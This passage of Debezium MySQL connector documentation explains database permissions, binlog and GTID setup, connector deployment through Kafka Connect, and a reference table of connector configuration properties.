mysql> GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'user' IDENTIFIED BY 'password';
----
+
The table below describes the permissions.
+
IMPORTANT: If using a hosted option such as Amazon RDS or Amazon Aurora that does not allow a global read lock, table-level locks are used to create the _consistent snapshot_. In this case, you need to also grant `LOCK TABLES` permissions to the user that you create. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for more details.

. Finalize the user's permissions:
+
[source,SQL]
----
mysql> FLUSH PRIVILEGES;
----

[[permissions-explained-mysql-connector]]
.Descriptions of user permissions
[cols="3,7",options="header",subs="+attributes"]
|===
|Keyword |Description

|`SELECT`
|Enables the connector to select rows from tables in databases. This is used only when performing a snapshot.

|`RELOAD`
|Enables the connector to use the `FLUSH` statement to clear or reload internal caches, flush tables, or acquire locks. This is used only when performing a snapshot.

|`SHOW DATABASES`
|Enables the connector to see database names by issuing the `SHOW DATABASES` statement. This is used only when performing a snapshot.

|`REPLICATION SLAVE`
|Enables the connector to connect to and read the MySQL server binlog.

|`REPLICATION CLIENT`
a|Enables the connector to use the following statements:

* `SHOW MASTER STATUS`
* `SHOW SLAVE STATUS`
* `SHOW BINARY LOGS`

The connector always requires this.

|`ON`
|Identifies the database to which the permissions apply.

|`TO 'user'`
|Specifies the user to grant the permissions to.

|`IDENTIFIED BY 'password'`
|Specifies the user's MySQL password.

|===

// Type: procedure
// ModuleID: enabling-the-mysql-binlog-for-debezium
// Title: Enabling the MySQL binlog for {prodname}
[[enable-mysql-binlog]]
=== Enabling the binlog

You must enable binary logging for MySQL replication. The binary logs record transaction updates for replication tools to propagate changes.

.Prerequisites

* A MySQL server.
* Appropriate MySQL user privileges.

.Procedure

. Check whether the `log-bin` option is already on:
+
[source,SQL]
----
mysql> SELECT variable_value as "BINARY LOGGING STATUS (log-bin) ::"
FROM information_schema.global_variables WHERE variable_name='log_bin';
----

. If it is `OFF`, configure your MySQL server configuration file with the following properties, which are described in the table below:
+
[source,properties]
----
server-id = 223344
log_bin = mysql-bin
binlog_format = ROW
binlog_row_image = FULL
expire_logs_days = 10
----

. Confirm your changes by checking the binlog status once more:
+
[source,SQL]
----
mysql> SELECT variable_value as "BINARY LOGGING STATUS (log-bin) ::"
FROM information_schema.global_variables WHERE variable_name='log_bin';
----

[[binlog-configuration-properties-mysql-connector]]
.Descriptions of MySQL binlog configuration properties
[cols="1,4",options="header",subs="+attributes"]
|===
|Property |Description

|`server-id`
|The value for the `server-id` must be unique for each server and replication client in the MySQL cluster. During MySQL connector setup, {prodname} assigns a unique server ID to the connector.

|`log_bin`
|The value of `log_bin` is the base name of the sequence of binlog files.

|`binlog_format`
|The `binlog_format` must be set to `ROW` or `row`.

|`binlog_row_image`
|The `binlog_row_image` must be set to `FULL` or `full`.

|`expire_logs_days`
|This is the number of days for automatic binlog file removal. The default is `0`, which means no automatic removal. Set the value to match the needs of your environment.
See {link-prefix}:{link-mysql-connector}#mysql-purges-binlog-files-used-by-debezium[MySQL purges binlog files].

|===

// Type: procedure
// ModuleID: enabling-mysql-gtids-for-debezium
// Title: Enabling MySQL Global Transaction Identifiers for {prodname}
[[enable-mysql-gtids]]
=== Enabling GTIDs

Global transaction identifiers (GTIDs) uniquely identify transactions that occur on a server within a cluster. Though not required for a {prodname} MySQL connector, using GTIDs simplifies replication and enables you to more easily confirm if primary and replica servers are consistent.

GTIDs are available in MySQL 5.6.5 and later. See the link:https://dev.mysql.com/doc/refman/{mysql-version}/en/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for more details.

.Prerequisites

* A MySQL server.
* Basic knowledge of SQL commands.
* Access to the MySQL configuration file.

.Procedure

. Enable `gtid_mode` in your MySQL configuration file:
+
[source,properties]
----
gtid_mode=ON
----

. Enable `enforce_gtid_consistency`:
+
[source,properties]
----
enforce_gtid_consistency=ON
----

. Confirm the changes:
+
[source,SQL]
----
mysql> show global variables like '%GTID%';
----

.Result
[source,SQL]
----
+--------------------------+-------+
| Variable_name            | Value |
+--------------------------+-------+
| enforce_gtid_consistency | ON    |
| gtid_mode                | ON    |
+--------------------------+-------+
----

.Descriptions of GTID options
[cols="3,7",options="header",subs="+attributes"]
|===
|Option |Description

|`gtid_mode`
a|Boolean that specifies whether GTID mode of the MySQL server is enabled or not.

* `ON` = enabled
* `OFF` = disabled

|`enforce_gtid_consistency`
a|Boolean that specifies whether the server enforces GTID consistency by allowing the execution of statements that can be logged in a transactionally safe manner. Required when using GTIDs.

* `ON` = enabled
* `OFF` = disabled

|===


// Type: procedure
// ModuleID: configuring-mysql-session-timeouts-for-debezium
// Title: Configuring MySQL session timeouts for {prodname}
[[mysql-session-timeouts]]
=== Configuring session timeouts

When an initial consistent snapshot is made for large databases, your established connection could time out while the tables are being read. You can prevent this behavior by configuring `interactive_timeout` and `wait_timeout` in your MySQL configuration file.

.Prerequisites

* A MySQL server.
* Basic knowledge of SQL commands.
* Access to the MySQL configuration file.

.Procedure

. Configure `interactive_timeout`:
+
[source,properties]
----
interactive_timeout=<duration-in-seconds>
----

. Configure `wait_timeout`:
+
[source,properties]
----
wait_timeout=<duration-in-seconds>
----

.Descriptions of MySQL session timeout options
[cols="3,7",options="header",subs="+attributes"]
|===
|Option |Description

|`interactive_timeout`
a|The number of seconds the server waits for activity on an interactive connection before closing it. See link:https://dev.mysql.com/doc/refman/{mysql-version}/en/server-system-variables.html#sysvar_interactive_timeout[MySQL's documentation] for more details.

|`wait_timeout`
a|The number of seconds the server waits for activity on a non-interactive connection before closing it.
See link:https://dev.mysql.com/doc/refman/{mysql-version}/en/server-system-variables.html#sysvar_wait_timeout[MySQL's documentation] for more details.

|===

// Type: procedure
// ModuleID: enabling-query-log-events-for-debezium-mysql-connectors
// Title: Enabling query log events for {prodname} MySQL connectors
[[enable-query-log-events]]
=== Enabling query log events

You might want to see the original `SQL` statement for each binlog event. Enabling the `binlog_rows_query_log_events` option in the MySQL configuration file allows you to do this.

This option is available in MySQL 5.6 and later.

.Prerequisites

* A MySQL server.
* Basic knowledge of SQL commands.
* Access to the MySQL configuration file.

.Procedure

* Enable `binlog_rows_query_log_events` in your MySQL configuration file:
+
[source,properties]
----
binlog_rows_query_log_events=ON
----
+
`binlog_rows_query_log_events` is set to a value that enables or disables support for including the original `SQL` statement in the binlog entry.
+
** `ON` = enabled
** `OFF` = disabled

// Type: assembly
// ModuleID: deploying-debezium-mysql-connectors
// Title: Deploying {prodname} MySQL connectors
[[mysql-deploying-a-connector]]
== Deployment

To deploy a {prodname} MySQL connector, install the {prodname} MySQL connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.

ifdef::product[]
Details are in the following topics:

* xref:installing-debezium-mysql-connectors[]
* xref:debezium-mysql-connector-configuration-example[]
* xref:adding-debezium-mysql-connector-configuration-to-kafka-connect[]
* xref:descriptions-of-debezium-mysql-connector-configuration-properties[]
endif::product[]

// Type: procedure
// Title: Installing {prodname} MySQL connectors
[id="installing-debezium-mysql-connectors"]
=== Installing

To install a {prodname} MySQL connector, download the connector archive, extract it to your Kafka Connect environment, and ensure that the plug-ins parent directory is specified in your Kafka Connect environment.

.Prerequisites

* link:https://zookeeper.apache.org/[Zookeeper], link:http://kafka.apache.org/[Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.
* MySQL Server is installed and set up for {prodname}.

.Procedure

ifdef::product[]
. Download the link:https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=red.hat.integration&downloadType=distributions[{prodname} MySQL connector].
endif::product[]
ifdef::community[]
ifeval::['{page-version}' == 'master']
. Download the {prodname} link:{link-mysql-plugin-snapshot}[MySQL connector plug-in].
endif::[]
ifeval::['{page-version}' != 'master']
. Download the {prodname} link:https://repo1.maven.org/maven2/io/debezium/debezium-connector-mysql/{debezium-version}/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[MySQL connector plug-in].
endif::[]
endif::community[]
. Extract the files into your Kafka Connect environment.
. Add the plug-ins parent directory to your Kafka Connect `plugin.path`:
+
[source]
----
plugin.path=/kafka/connect
----
+
The above example assumes that you extracted the {prodname} MySQL connector into the `/kafka/connect/debezium-connector-mysql` path.

. Restart your Kafka Connect process.
This ensures that the new JAR files are picked up.

// Type: concept
// ModuleID: debezium-mysql-connector-configuration-example
// Title: {prodname} MySQL connector configuration example
[[mysql-example-configuration]]
=== Connector configuration example

ifdef::community[]
Typically, you configure a {prodname} MySQL connector in a `.json` file that sets configuration properties for the connector. Following is an example configuration for a MySQL connector that connects to a MySQL server on port 3306 at 192.168.99.100, whose logical name is `fullfillment`.

For details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].

[source,json]
----
{
 "name": "inventory-connector", // <1>
 "config": {
 "connector.class": "io.debezium.connector.mysql.MySqlConnector", // <2>
 "database.hostname": "192.168.99.100", // <3>
 "database.port": "3306", // <4>
 "database.user": "debezium-user", // <5>
 "database.password": "debezium-user-pw", // <6>
 "database.server.id": "184054", // <7>
 "database.server.name": "fullfillment", // <8>
 "database.whitelist": "inventory", // <9>
 "database.history.kafka.bootstrap.servers": "kafka:9092", // <10>
 "database.history.kafka.topic": "dbhistory.fullfillment", // <11>
 "include.schema.changes": "true" // <12>
 }
}
----
<1> Connector's name when registered with the Kafka Connect service.
<2> Connector's class name.
<3> MySQL server address.
<4> MySQL server port number.
<5> MySQL user with the appropriate privileges.
<6> MySQL user's password.
<7> Unique ID of the connector.
<8> Logical name of the MySQL server or cluster.
<9> List of databases hosted by the specified server.
<10> List of Kafka brokers that the connector uses to write and recover DDL statements to the database history topic.
<11> Name of the database history topic. This topic is for internal use only and should not be used by consumers.
<12> Flag that specifies if the connector should generate events for DDL changes and emit them to the `fullfillment` schema change topic for use by consumers.
endif::community[]

ifdef::product[]

Typically, you configure a {prodname} MySQL connector in a `.yaml` file that sets connector configuration properties. Following is an example of the configuration for a MySQL connector that connects to a MySQL server on port 3306 and captures changes to the `inventory` database.
\nFor details, see {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\n[source,yaml,options=\"nowrap\"]\n----\n apiVersion: kafka.strimzi.io\/v1beta1\n kind: KafkaConnector\n metadata:\n name: inventory-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n spec:\n class: io.debezium.connector.mysql.MySqlConnector\n tasksMax: 1 \/\/ <2>\n config: \/\/ <3>\n database.hostname: mysql \/\/ <4>\n database.port: 3306\n database.user: debezium\n database.password: dbz\n database.server.id: 184054 \/\/ <5>\n database.server.name: dbserver1 \/\/ <5>\n database.whitelist: inventory \/\/ <6>\n database.history.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <7>\n database.history.kafka.topic: schema-changes.inventory \/\/ <7>\n----\n\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of the connector.\n\n|2\n|Only one task should operate at any one time.\nBecause the MySQL connector reads the MySQL server\u2019s `binlog`,\nusing a single connector task ensures proper order and event handling.\nThe Kafka Connect service uses connectors to start one or more tasks that do the work,\nand it automatically distributes the running tasks across the cluster of Kafka Connect services.\nIf any of the services stop or crash,\nthose tasks will be redistributed to running services.\n\n|3\n|The connector\u2019s configuration.\n\n|4\n|The database host, which is the name of the container running the MySQL server (`mysql`).\n\n|5\n|A unique server ID and name.\nThe server name is the logical identifier for the MySQL server or cluster of servers.\nThis name is used as the prefix for all Kafka topics.\n\n|6\n|Changes in only the `inventory` database are captured.\n\n|7\n|The connector stores the history of the database schemas in Kafka using this broker (the same broker to which you are sending events) and topic name.\nUpon restart, the connector recovers the schemas of the database that existed at the point in time in the binlog when the connector should begin reading.\n\n|===\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: adding-debezium-mysql-connector-configuration-to-kafka-connect\n\/\/ Title: Adding {prodname} MySQL connector configuration to Kafka Connect\n[[mysql-adding-configuration]]\n=== Adding connector configuration \nifdef::community[]\nTo start running a MySQL connector, configure a connector and add the configuration to your Kafka Connect cluster. \n\n.Prerequisites\n\n* {link-prefix}:{link-mysql-connector}#setting-up-mysql[MySQL server] is \nset up for a {prodname} connector.\n\n* {prodname} MySQL connector is installed. \n\n.Procedure\n\n. Create a configuration for the MySQL connector.\n\n. Use the link:{link-kafka-docs}\/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster. \n\nendif::community[]\n\nifdef::product[]\nYou can use a provided {prodname} container to deploy a {prodname} MySQL connector. In this procedure, you build a custom Kafka Connect container image for {prodname}, configure the {prodname} connector as needed, and then add your connector configuration to your Kafka Connect environment. \n\n.Prerequisites\n\n* Podman or Docker is installed.\n* You have sufficient rights to create and manage containers.\n* You downloaded the {prodname} MySQL connector archive. \n\n.Procedure\n\n. 
Extract the {prodname} MySQL connector archive to create a directory structure for the connector plug-in, for example:
+
[subs="+macros"]
----
pass:quotes[*tree ./my-plugins/*]
./my-plugins/
├── debezium-connector-mysql
│ ├── ...
----

. Create and publish a custom image for running your {prodname} connector:

.. Create a new `Dockerfile` by using `{DockerKafkaConnect}` as the base image. In the following example, you would replace _my-plugins_ with the name of your plug-ins directory:
+
[subs="+macros,+attributes"]
----
FROM {DockerKafkaConnect}
USER root:root
pass:quotes[COPY _./my-plugins/_ /opt/kafka/plugins/]
USER 1001
----
+
Before Kafka Connect starts running the connector, Kafka Connect loads any third-party plug-ins that are in the `/opt/kafka/plugins` directory.

.. Build the container image. For example, to tag the image that is built from the `Dockerfile` that you created in the previous step as `debezium-container-for-mysql`, run the following command from the directory that contains the `Dockerfile`:
+
`podman build -t debezium-container-for-mysql:latest .`

.. Push your custom image to your container registry, for example:
+
`podman push debezium-container-for-mysql:latest`

.. Point to the new container image. Do one of the following:
+
* Edit the `spec.image` property of the `KafkaConnect` custom resource. If set, this property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator. For example:
+
[source,yaml,subs="+attributes"]
----
apiVersion: {KafkaConnectApiVersion}
kind: KafkaConnect
metadata:
 name: my-connect-cluster
spec:
 #...
 image: debezium-container-for-mysql
----
+
* In the `install/cluster-operator/050-Deployment-strimzi-cluster-operator.yaml` file, edit the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable to point to the new container image and reinstall the Cluster Operator. If you edit this file you must apply it to your OpenShift cluster.

. Create a `KafkaConnector` custom resource that defines your {prodname} MySQL connector instance. See {LinkDebeziumUserGuide}#mysql-example-configuration[the connector configuration example].

. Apply the connector instance, for example:
+
`oc apply -f inventory-connector.yaml`
+
This registers `inventory-connector` and the connector starts to run against the `inventory` database.

. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.

.. Display the Kafka Connect log output:
+
[source,shell,options="nowrap"]
----
oc logs $(oc get pods -o name -l strimzi.io/name=my-connect-cluster-connect)
----

.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:
+
[source,shell,options="nowrap"]
----
... INFO Starting snapshot for ...
... INFO Snapshot is using user 'debezium' ...
----

endif::product[]

.Results

When the connector starts, it {link-prefix}:{link-mysql-connector}#mysql-snapshots[performs a consistent snapshot] of the MySQL databases that the connector is configured for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.

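After the snapshot completes, one way to confirm that streaming works is to commit a change to a captured table and watch the corresponding Kafka topic for a new change event record. For example, with the sample `inventory` database used in this guide (the column value here is illustrative):

[source,SQL]
----
-- Any committed row-level change to a captured table should appear
-- as a new change event record on that table's Kafka topic.
UPDATE customers SET email = 'annek@example.com' WHERE id = 1004;
----
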

// Type: reference
// ModuleID: descriptions-of-debezium-mysql-connector-configuration-properties
// Title: Description of {prodname} MySQL connector configuration properties
[[mysql-connector-properties]]
=== Connector properties

The {prodname} MySQL connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:

* xref:mysql-required-connector-configuration-properties[Required connector configuration properties]
* xref:mysql-advanced-connector-configuration-properties[Advanced connector configuration properties]
* xref:mysql-pass-through-configuration-properties[Pass-through configuration properties]

[id="mysql-required-connector-configuration-properties"]
The following configuration properties are _required_ unless a default value is available.

.Required MySQL connector configuration properties
[cols="33%a,17%a,50%a",options="header",subs="+attributes"]
|===
|Property |Default |Description

|[[mysql-property-name]]<<mysql-property-name, `name`>>
|
|Unique name for the connector. Attempting to register again with the same name fails. This property is required by all Kafka Connect connectors.

|[[mysql-property-connector-class]]<<mysql-property-connector-class, `connector.class`>>
|
|The name of the Java class for the connector. Always specify `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.

|[[mysql-property-tasks-max]]<<mysql-property-tasks-max, `tasks.max`>>
|`1`
|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.

|[[mysql-property-database-hostname]]<<mysql-property-database-hostname, `database.hostname`>>
|
|IP address or host name of the MySQL database server.

|[[mysql-property-database-port]]<<mysql-property-database-port, `database.port`>>
|`3306`
|Integer port number of the MySQL database server.

|[[mysql-property-database-user]]<<mysql-property-database-user, `database.user`>>
|
|Name of the MySQL user to use when connecting to the MySQL database server.

|[[mysql-property-database-password]]<<mysql-property-database-password, `database.password`>>
|
|Password to use when connecting to the MySQL database server.

|[[mysql-property-database-server-name]]<<mysql-property-database-server-name, `database.server.name`>>
|
|Logical name that identifies and provides a namespace for the particular MySQL database server/cluster in which {prodname} is capturing changes. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names that receive events emitted by this connector.
Only alphanumeric characters and underscores are allowed in this name.

|[[mysql-property-database-server-id]]<<mysql-property-database-server-id, `database.server.id`>>
|_random_
|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though the recommendation is to explicitly set a value.

|[[mysql-property-database-history-kafka-topic]]<<mysql-property-database-history-kafka-topic, `database.history.kafka{zwsp}.topic`>>
|
|The full name of the Kafka topic where the connector stores the database schema history.

|[[mysql-property-database-history-kafka-bootstrap-servers]]<<mysql-property-database-history-kafka-bootstrap-servers, `database.history{zwsp}.kafka.bootstrap{zwsp}.servers`>>
|
|A list of host/port pairs that the connector uses for establishing an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the Kafka Connect process.

|[[mysql-property-database-whitelist]]
[[mysql-property-database-include-list]]<<mysql-property-database-include-list, `database.include.list`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match the names of the databases for which to capture changes. The connector does not capture changes in any database whose name is not in `database.include.list`. By default, the connector captures changes in all databases.
Do not also set the `database.exclude.list` connector configuration property.

|[[mysql-property-database-blacklist]]
[[mysql-property-database-exclude-list]]<<mysql-property-database-exclude-list, `database.exclude.list`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match the names of databases for which you do not want to capture changes. The connector captures changes in any database whose name is not in the `database.exclude.list`.
Do not also set the `database.include.list` connector configuration property.

|[[mysql-property-table-whitelist]]
[[mysql-property-table-include-list]]<<mysql-property-table-include-list, `table.include.list`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers of tables whose changes you want to capture. The connector does not capture changes in any table not included in `table.include.list`. Each identifier is of the form _databaseName_._tableName_. By default, the connector captures changes in every non-system table in each database whose changes are being captured.
Do not also specify the `table.exclude.list` connector configuration property.

|[[mysql-property-table-blacklist]]
[[mysql-property-table-exclude-list]]<<mysql-property-table-exclude-list, `table.exclude.list`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want to capture. The connector captures changes in any table not included in `table.exclude.list`. Each identifier is of the form _databaseName_._tableName_.
Do not also specify the `table.include.list` connector configuration property.

|[[mysql-property-column-blacklist]]
[[mysql-property-column-exclude-list]]<<mysql-property-column-exclude-list, `column.exclude.list`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event record values.
Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-include-list]]<<mysql-property-column-include-list, `column.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to include in change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-truncate-to-length-chars]]<<mysql-property-column-truncate-to-length-chars, `column.truncate.to{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event record values if the field values are longer than the specified number of characters. You can configure multiple properties with different lengths in a single configuration. The length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-with-length-chars]]<<mysql-property-column-mask-with-length-chars, `column.mask.with{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. You can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-hash]]<<mysql-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in the change event record values. Pseudonyms consist of the hashed value obtained by applying the algorithm `_hashAlgorithm_` and salt `_salt_`. +\n +\nBased on the hash function used, referential integrity is kept while data is pseudonymized. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash result is automatically shortened to the length of the column. +\n +\nYou can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName` +\n +\n`CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the configured `_hashAlgorithm_`, the selected `_salt_`, and the actual data set, the resulting masked data set might not be completely anonymized.\n\n|[[mysql-property-column-propagate-source-type]]<<mysql-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. 
These schema parameters: \n\n`pass:[_]pass:[_]{prodname}.source.column.type` \n\n`pass:[_]pass:[_]{prodname}.source.column.length` \n \n`pass:[_]pass:[_]{prodname}.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of one of these forms: \n\n_databaseName_._tableName_._columnName_ \n\n_databaseName_._schemaName_._tableName_._columnName_\n\n|[[mysql-property-datatype-propagate-source-type]]<<mysql-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n \n`pass:[_]pass:[_]debezium.source.column.type` \n\n`pass:[_]pass:[_]debezium.source.column.length`\n\n`pass:[_]pass:[_]debezium.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified data type names are of one of these forms: \n\n_databaseName_._tableName_._typeName_ \n\n_databaseName_._schemaName_._tableName_._typeName_ \n \nSee {link-prefix}:{link-mysql-connector}#mysql-data-types[how MySQL connectors map data types] for the list of MySQL-specific data type names.\n\n|[[mysql-property-time-precision-mode]]<<mysql-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive_time{zwsp}_microseconds`\n|Time, date, and timestamps can be represented with different kinds of precision, including: +\n +\n`adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds. +\n +\nifdef::community[]\n`adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\nendif::community[]\n +\n`connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision.\n\n|[[mysql-property-decimal-handling-mode]]<<mysql-property-decimal-handling-mode,`decimal.handling.mode`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[mysql-property-bigint-unsigned-handling-mode]]<<mysql-property-bigint-unsigned-handling-mode, `bigint.unsigned{zwsp}.handling.mode`>>\n|`long`\n|Specifies how BIGINT UNSIGNED columns should be represented in change events. 
Possible settings are: +
 +
 `long` represents values by using Java's `long`, which might not offer the precision of the original value but which is easy to use in consumers. `long` is usually the preferred setting. +
 +
`precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events by using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type. Use this setting when working with values larger than 2^63, because these values cannot be conveyed by using `long`.

|[[mysql-property-include-schema-changes]]<<mysql-property-include-schema-changes, `include.schema{zwsp}.changes`>>
|`true`
|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded by using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history.

|[[mysql-property-include-query]]<<mysql-property-include-query, `include.query`>>
|`false`
|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +
 +
If you set this option to `true` then you must also configure MySQL with the `binlog_rows_query_log_events` option set to `ON`. When `include.query` is `true`, the query is not present for events that the snapshot process generates. +
 +
Setting `include.query` to `true` might expose tables or fields explicitly excluded or masked by including the original SQL statement in the change event. For this reason, the default setting is `false`.

|[[mysql-property-event-processing-failure-handling-mode]]<<mysql-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling.mode`>>
|`fail`
|Specifies how the connector should react to exceptions during deserialization of binlog events. +
 +
`fail` propagates the exception, which indicates the problematic event and its binlog offset, and causes the connector to stop. +
 +
`warn` logs the problematic event and its binlog offset and then skips the event. +
 +
`skip` passes over the problematic event and does not log anything.

|[[mysql-property-inconsistent-schema-handling-mode]]<<mysql-property-inconsistent-schema-handling-mode, `inconsistent.schema{zwsp}.handling.mode`>>
|`fail`
|Specifies how the connector should react to binlog events that relate to tables that are not present in the internal schema representation. That is, the internal representation is not consistent with the database. +
 +
`fail` throws an exception that indicates the problematic event and its binlog offset, and causes the connector to stop. +
 +
`warn` logs the problematic event and its binlog offset and skips the event. +
 +
`skip` passes over the problematic event and does not log anything.

|[[mysql-property-max-queue-size]]<<mysql-property-max-queue-size, `max.queue.size`>>
|`8192`
|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slow or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector.
Defaults to 8192, and should always be larger than the maximum batch size specified by the `max.batch.size` property.\n\n|[[mysql-property-max-batch-size]]<<mysql-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mysql-property-poll-interval-ms]]<<mysql-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mysql-property-connect-timeout-ms]]<<mysql-property-connect-timeout-ms, `connect.timeout.ms`>>\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|[[mysql-property-gtid-source-includes]]<<mysql-property-gtid-source-includes, `gtid.source.includes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that match one of these include patterns are used.\nDo not also specify a setting for `gtid.source.excludes`.\n\n|[[mysql-property-gtid-source-excludes]]<<mysql-property-gtid-source-excludes, `gtid.source.excludes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that do not match any of these exclude patterns are used. Do not also specify a value for `gtid.source.includes`.\n\nifdef::community[]\n|[[mysql-property-gtid-new-channel-position]]<<mysql-property-gtid-new-channel-position, `gtid.new.channel.position`>> +\n_deprecated and scheduled for removal_\n|`earliest`\n|When set to `latest`, when the connector sees a new GTID channel, it starts consuming from the last executed transaction in that GTID channel. If set to `earliest` (default), the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where {prodname} is connected to the primary server. In this case, during failover, the replica with the new UUID (and GTID channel) starts receiving writes before {prodname} is connected. These writes would be lost when using `latest`.\nendif::community[]\n\n|[[mysql-property-tombstones-on-delete]]<<mysql-property-tombstones-on-delete, `tombstones.on.delete`>>\n|`true`\n|Controls whether a delete event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a delete event and a subsequent tombstone event. +\n +\n`false` - only a delete event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row. 